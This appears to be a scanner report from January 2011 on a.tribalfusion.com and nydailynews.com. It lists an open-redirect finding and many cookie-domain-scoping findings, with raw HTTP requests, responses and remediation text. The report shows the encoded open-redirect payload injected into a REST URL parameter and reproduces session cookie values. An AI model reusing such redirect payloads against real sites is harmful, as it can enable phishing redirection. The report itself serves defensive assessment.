GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ad97bba2a29a29e53/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http%3a//ad97bba2a29a29e53/a%3fhttp%3a/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:10:48 GMT Server: Apache X-Drupal-Cache: MISS Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 ETag: "1296223848" Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/ Content-Length: 95223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:10:49 GMT Server: Apache X-Drupal-Cache: MISS Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 ETag: "1296223849" Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/ Content-Length: 102098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 